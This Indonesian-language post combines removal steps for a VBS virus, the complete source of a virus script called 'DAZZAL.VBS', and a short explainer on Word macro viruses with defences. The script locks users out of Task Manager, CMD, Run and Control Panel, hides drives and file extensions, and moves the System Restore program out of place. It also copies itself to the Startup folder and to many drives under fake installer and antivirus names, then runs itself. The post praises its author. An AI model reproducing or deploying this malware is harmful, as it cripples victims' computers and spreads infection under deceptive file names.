Juga boleh, yg bawahnya gak usah kalian lanjutin bisa..
Cara bunuhnya gampang.
Ikutin aja langkah2 dibawah ini untuk pembasmiannya.kalo virusnya aktif, (kalo belum, diaktifkan laaah) jangan buka my computer seperti biasa.tapi buka melalui explorer, bisa lewat start -> klik kanan di my computer, bisa lewat jendela + e(logo windows yang ada di keyboard). Lalu masuk di setiap drive melalui tree, ini agar virusnya tidak jalan di banyak drive, cuman cukup jalan di satu drive dimana kalian simpan dan mengaktifakn virus tersebut. Soalnya, kalo virusnya sudah aktif, lalu kalian klik 2x tiap2 drive kalian maka virus itu aktif di banyak drive soalnya di setiap drive ada file autorunnya.
Cara pembasmiannya :
1. Pake plugins ansav yang registry fx, ansav bisa kalian dapatkan disini http://ansav.com/. Setelah itu pilih check all, lalu restart explorer
2. Panggil task manager, bisa melalui ctrl+shift bersamaan lalu tekan esc di processes bunuh semua wscript.exe yang ada
3. Hapus semua file vhck3d.vbs serta autorun.inf di setiap drive
4. Hapus file induknya di c:\windows\system32 yang bernama hck3d.vbs
5. Panggil run, bisa melalui jendela + r (logo windows di keboard)masukkan parameternya PCMAV untuk mengembalikan settingan registry yang dirubah.
(thanks to Galang, junior hacker and vixer ^_^. Yang telah mengembangkan virus ini dengan cukup baik...)
SCRIPT VIRUS DAZZAL.VBS
On error resume next
Dim Regpen, FSO, Copier, Creator, Dupler, Deleter, Runner
set Regpen = CreateObject ("Wscript.Shell")
set FSO = CreateObject ("Scripting.FileSystemObject")
set Creator = FSO.CreateTextFile ("C:\Ternate.vbs", true)
Creator.WriteLine ("Msgbox ("& Chr (34) & "Salam Kenal dari Saya, Mr.Dajjal :<" & chr (34)& ")") Creator.Close Regpen.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\System\NoRun","1","REG_DWORD" Regpen.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\System\DisableTaskMgr","1","RE G_DWORD" Regpen.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\System\DisableCMD","1","REG_DW ORD" Regpen.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoFolderOption","1"," REG_DWORD" Regpen.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoDrives","16","REG_D WORD" Regpen.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoSaveSettings","1"," REG_DWORD" Regpen.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoControlPanel","1"," REG_DWORD" Regpen.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\NoSetTaskbar","1","REG_DWORD" Regpen.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer\Advanced\HideFileExt" ,"1","REG_DWORD" Regpen.Regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Winlogon\LegalNoticeCaption", "THE Syaithan-X" Regpen.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Winlogon\LegalNoticeText","ASSALAMUALA IKUM, YA AHLIL KUBUR" Set Copier = FSO.GetFile ("C:\Ternate.vbs") Copier.Copy ("C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Adobe.vbs")
FSO.CreateFolder ("C:\Program Files\Microsoft 0ffice\0ffice12")
FSO.CreateFolder ("D:\Program")
FSO.CreateFolder ("E:\Program")
FSO.CreateFolder ("F:\Program")
FSO.CreateFolder ("G:\Program")
FSO.CreateFolder ("H:\Program")
FSO.CreateFolder ("I:\Program")
FSO.CreateFolder ("J:\Program")
FSO.CreateFolder ("K:\Program")
Set Deleter = FSO.GetFile ("C:\Windows\System32\Restore\rstrui.exe")
Deleter.Move ("C:\Program Files\Microsoft 0ffice\0ffice12\rstrui.Gnamu")
set Dupler = FSO.GetFile (WScript.ScriptFullName)
Dupler.Copy ("C:\Program Files\Microsof 0ffice\0ffice12\Hantu.vbs")
Dupler.Copy ("C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Desktop.ini.vbs")
Dupler.Copy ("C:\Documents and Settings\All Users\Desktop\Dajjal_Antivirus.exe.vbs")
Dupler.Copy ("C:\Windows\System32\Restore\rstrui.exe.vbs")
Dupler.Copy ("D:\Program\MotoGP_SETUP.vbs")
Dupler.Copy ("E:\Program\TuneUp2009_SETUP.vbs")
Dupler.Copy ("F:\Program\Ansav_SETUP.vbs")
Dupler.Copy ("G:\Program\DeltaForce_SETUP.vbs")
Dupler.Copy ("H:\Program\DeltaForce_SETUP.vbs")
Dupler.Copy ("I:\Program\Ansav_SETUP.vbs")
Dupler.Copy ("J:\Program\Project.vbs")
Dupler.Copy ("K:\Program\Hantu.vbs")
Set Runner = WScript.CreateObject ("WScript.Shell")
Runner.Run ("C:\Program Files\Microsoft 0ffice\0ffice12\Hantu.vbs")
Cara kerja virus Macro
Cara kerja virus Macro yang akan dibahas adalah virus Microsoft Word. Virus akan menginfeksi file Microsoft Word dengan ekstension DOT (Document Template) dan DOC (Document), dimana apabila kita menggunakan Microsoft Word untuk memanggil file-file tersebut maka macro dari virus akan dijalankan, didalam macro inilah terdapat instruksi-instruksi untuk menyebar virus maupun melakukan manipulasi lainnya.
Biasanya virus akan menulari/memodifikasi file NORMAL.DOT yang memang ada pada setiap komputer yang menggunakan
Microsoft Word, sebab file tersebut adalah file yang dijadikan standar awal pengetikan dan juga merupakan file yang pertama kali dibuka oleh Microsoft Word ketika dieksekusi. Tetapi ada juga virus yang tidak melakukan manipulasi pada file ini tetapi membuat file DOT baru yang mengandung virus dan merubah program Microsoft Word untuk menggantikan file NORMAL.DOT itu dengan file buatan virus.
Sebagai contoh virus Melissa yang sangat terkenal itu merupakan virus macro Microsoft Word yang media penyebarannya dapat melalui internet, mengirim dirinya sendiri lewat e-mail sebagai attachment.
Penanggulangannya
- Ubah atribut seluruh document template terutama file NORMAL.DOT menjadi read-only. Dengan demikian untuk virus-
virus sederhana tidak akan mampu untuk menulari komputer sebab virus tidak dapat menulis apapun pada file NORMAL.DOT, tetapi ada juga virus yang tidak terpengaruh oleh tindakan pencegahan ini.
- Apabila kita tidak memiliki antivirus yang memadai dan Microsoft Word telah terkena virus, hapus file NORMAL.DOT sebab
umumnya program akan membuat file NORMAL.DOT kembali dengan tanpa virus.
- Periksa setiap file dengan menggunakan program antivirus (usahakan yang terbaru) sebelum kita menggunakannya.
- Apabila program antivirus tidak dapat mengatasi atau mendeteksinya, file document kita buka dengan menggunakan program Wordpad (program pengetikan paket pada setiap Microsoft Windows) lalu file dikonversi menjadi file RTF (Rich Text File), baru kemudian file RTF itu kita buka dengan Microsoft Word dan bila perlu kita konversi lagi menjadi document. Apabila Wordpad tidak dapat membuka file tersebut, bisa kita gunakan program pengetikan lainnya sebagai pengganti seperti Corel Word Perfect ataupun Adobe Type Manager.
